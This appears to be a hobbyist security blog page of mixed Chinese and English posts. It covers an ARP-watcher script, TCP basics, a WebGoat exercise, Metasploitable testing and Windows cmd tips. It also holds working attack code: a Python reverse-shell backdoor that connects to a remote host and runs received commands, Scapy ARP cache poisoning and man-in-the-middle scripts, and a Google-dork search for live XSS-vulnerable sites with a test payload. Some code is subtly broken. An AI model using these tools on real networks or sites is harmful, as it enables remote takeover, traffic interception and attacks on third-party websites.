ARP-Watcher

Source code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
#!/usr/bin/env python
#coding:utf-8

'''
This tool reports all newly connected devices to our network
 therefore it has to remember all IP to MAC resolutions.
 Additionally it can detect if a device suddenly changes
 its MAC address.
'''

from scapy.all import sniff, ARP
from signal import signal, SIGINT
import sys

arp_watcher_db_file = "/var/cache/arp-watcher.db"
ip_mac = {}

def sig_int_handler(signum, frame):
    print "Got SIGINT. Saving ARP database..."
    try:
        f = open(arp_watcher_db_file, "w")
        for (ip, mac) in ip_mac.items():
            f.write(ip + " " + mac + "\n")

        f.close()
        print "Done."
    except IOError:
        print "Cannot write file " + arp_watcher_db_file
        sys.exit(1)

def watch_arp(pkt):
    #Got is-at pkt (ARP response)
    if  pkt[ARP].op == 2:
        print pkt[ARP].hwsrc + " " + pkt[ARP].psrc

        #Device is new. Remember it.
        if ip_mac.get(pkt[ARP].psrc) == None:
            print "Found new device " + pkt[ARP].hwsrc + " " + pkt[ARP].psrc
            ip_mac[pkt[ARP].psrc] = pkt[ARP].hwsrc

        #Device is known but has different IP

        elif ip_mac.get(pkt[ARP].psrc) and ip_mac[pkt[ARP].psrc] != pkt[ARP].hws
rc:
            print pkt[ARP].hwsrc + " has got new ip " + pkt[ARP].psrc + "(old "
+ ip_mac[pkt[ARP].psrc] + ")"

signal(SIGINT, sig_int_handler)

if len(sys.argv) < 2:
    print sys.argv[0] + " <iface>"
    sys.exit(0)

try:
    fh = open(arp_watcher_db_file, "r")
except IOError:
    print "Cannot read file " + arp_watcher_db_file
    sys.exit(1)

for line in fh:
    line.chomp()
    (ip, mac) = line.split(" ")
    ip_mac[IP] = mac

sniff(prn=watch_arp,filter="arp", iface=sys.argv[1], store=0)

Python backdoor program

Python backdoor program

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#!/usr/bin/env python
# encoding: utf-8

import subprocess, socket

HOST = '192.168.130.132'
PORT = 443

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.send("Mdzz! Boom~")

while 1:
    data = s.recv(1024)
    if data == "quit":
        break
    proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)

    stdoutput = proc.stdout.read() + proc.stderr.read()

    s.send(stdoutput)

s.send("Bye mdzz!")
s.close()

我在Kali那边进行nc监听
nc -l -p 443

我们必须要先开监听,等待被害机开启程序。

这个只是一个未完善的demo,还有很多可以改进的空间

Bypass a Path Based Access Control Scheme

WebGoat里的一道题目

描述:

分析目录

准备工具Tamper

启动Tamper(类似burpsuite功能),选中Basic那个页面点击View File
请求后,Tamper会类似劫持

我们可以看到View File会向服务端请求这个页面

我们修改这个路径

确定后,Tamper会把修改后的请求发送给服务器端,服务器端
将会返回我们规定的请求页面

造成这个原因有可能是中间件配置不当,导致该目录文件权限配置不当

WooYun Reference

TCP

Introduction blablabla…

TCP provides session management.

A new TCP session is initialized by the famous Three-Way-Handshake

TCP-flags

SYN– Ask for a new connection
ACK– Acknowledge the receipt of a packet
RST– Cancel a connection attempt (is usually send when a host tries to
connect to a closed port)
FIN– Cleanly close an established connection (must be acknowledged by
counterpart)
URG– Mark a packet as urgent
PSH– Bid the receiver to handle packet with higher priority

An Example Network

An Ethernet/TCP/IP network is what you nowadays think of if you hear the term
network,because it is by far the most common one. Its constructed of five layers
instead of the theoretical seven layers of the ISO/OSI model. For short refreshing:
Ethernet is on layer 2, IP(Internet Protocol) on layer 3, TCP(Transport Control
Protocol) or UDP on layer 4-6 and services like HTTP,SMTP,FTP on layer 7.

How a HTTP packet passes all those layers one after another.

We want to get the index page of www.google.com .
(1) Our computer parses the URL www.google.com into the following components:
HTTP as application protocol to be used.
the hostname www
the domain google
the Top-Level-Domain com
/

(2) Armed with these information our computer constructs the following HTTP-Header(Layer 7):
GET / HTTP 1.1
Host: www.google.com

(3) Next we head on to TCP (layer 4-6). It establishes a connection by the use of the
Three-Way-Handshake addressing the destination port 80(HTTP) and a random source
port to connect the browser with the network.

(4) IP (layer 3) recognize that it cannot use www.google.com for addressing since it can only
use IP addresses such as 12.34.56.78 so it makes a DNS query to resolve the IP for the
hostname.
Now IP checks if the destination host is in the same network as our computer.
This is not the case therefore a lookup into the routing table is necessary to retrieve
the address of the next hop.

Metasploitable靶机测试

安装

网上Google下载Metasploitable靶机,安装完打开默认的用户名和密码是
msfadmin,msfadmin

做一个小小的测试

在kali 进行nmap扫描可利用信息

1
nmap -sS 192.168.130.135

注意这个IP地址是我的靶机地址

我们可以看到丰富的端口信息

然后上我们的Metasploit

最后进行exploit

成功获取shell

Google hack

找到了一个网址可以被XSS

利用Google hack 的搜索功能:
inurl:/search_results.php?search=

测试是否能被XSS

我一般使用这条常见的

1
<script>alert("ERROR");</script>

我日刚才都把这条XSS 存到我博客里面了,汗….

我这边测试了一下
XSS测试

然后又恶搞了一下,看还能不能传入其他的
试了一下这条

里面的外链 是我存的图片外链地址.
传入图片

感觉还能做其他事情

等做完再更新吧

using cmd on WIndows to set interface on DHCP mode

设置本地网卡DHCP模式

netsh interface ip set address name=”本地连接” source=dhcp

本地连接为想要设置的网卡

利用cmd更换桌面壁纸

1.reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /t REG_SZ /d E:\photos\image1.bmp /f

2.cd C:\Windows\system32

3.RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

reference

Understanding Network Hacks--Scapy

0x01 Scapy

The default user on Kali linux is root. so we don’t need to use the command “sudo scapy”!
I tried once to set up the environment on OS X but eventually i just failed. It seems to
be the libdnet problem. I tried a lot of ways to fixed this probem. God damn it, i just
can’t fix it. if you can solve this problem pls let me know!

alright. let’s get started with scapy

first. create a packet using scapy

a=IP(ttl=10)
a
< IP ttl=10 |>
a.src
’127.0.0.1’
a.dst=”192.168.1.1”
a
< IP ttl=10 dst=192.168.1.1 |>
a.src
’192.168.8.14’
del(a.ttl)
a
< IP dst=192.168.1.1 |>
a.ttl
64

as we can see the default ttl is 64.

stack up layers according to the OSI model

ARP cache Poisoning

What is ARP cache Poisoning?

In computer networking, Arp spoofing,ARP cache poison routing, is a technique
by which an attacker sends (spoofed) Address Resolution Protocol(ARP) messages
onto a local area network.Generally, the aim is to associate the attacker’s
MAC address with the IP address of another host, such as the default gateway,
causing any traffic meant for that IP address to be sent to the attacker instead.

Arp spoofing may allow an attacker to intercept data frames on a network, modify
the traffic, or stop all traffic. Often the attack is used as an opening for other
attacks, such as denial of service, man in the middle, or session hijacking attacks.

The attack can only be used on networks that use the address resolution protocol,
and is limited to local network segments.

How to create an attack using Scapy?

code Part:

import sys
import time
from scapy.all import sendp, ARP, Ether

if len(sys.argv) < 3:
print sys.argv[0] + “: ,
sys.exit(1)

iface = “eth0”
target_ip = sys.argv[1]
fake_ip = sys.argv[2]

ethernet = Ether()
arp = ARP(pdst = target_ip, psrc = fake_ip, op=”is-at”)
packet = ethernet / arp

while True:
sendp(packet, iface=iface)
time.sleep(10)

How did it work?

With the help of Scapy we construct a packet called packet consisting of an
Ether() and an ARP() header. In the ARP header we set the IP address of the
victim (target_ip) and the IP which we would like to hijack all connections
(fake_ip). As last parameter we define the OP-Code is-at, that declares the
packet as an ARP response.Afterwads the function sendp() and not the function
send(), because the packet should be sent on layer 2.The function send() sends
packets on layer 3.

One last thing to remember to enable IP forwarding otherwise your host would
block the connection of the victim.

sysctl net.ipv4.ip_forward=1

Don’t forget to check the settings of your packet filter like IPtables, pf or
ipfw or just disable it.

Man in the middle

A computer that wants to get knowledge about an IP address asks with an ARP
request. I write the program that waits for ARP requests and sends a spoofed in
every received request. In a switched environment this will result in every
connection flowing over the computer of the attacker, because in every ARP cache
there will be the MAC for every IP address. This solution is more elegant and
not as noisy as the one before, but still quite easy to detected for a trained admin

Code Part:

import sys
from scapy.all import sniff, sendp, ARP, Ether

if len(sys.argv) < 2:
print sys.argv[0] + “
sys.exit(0)

def arp_poison_callback(packet):

#Got ARP request?
if packet[ARP].op == 1:
    answer = Ether(dst=packet[ARP].hwsrc) / ARP()
    answer[ARP].op = "is-at"
    answer[ARP].hwdst = packet[ARP].hwsrc
    answer[ARP].psrc = packet[ARP].pdst
    answer[ARP].pdst = packet[ARP].psrc

    print "Fooling " + packet[ARP].psrc + " that " + \
            packet[ARP].pdst + " is me"
    sendp(answer, iface=sys.argv[1])

sniff(prn=arp_poison_callback,
filter=”arp”,
iface=sys.argv[1],
store=0
)

,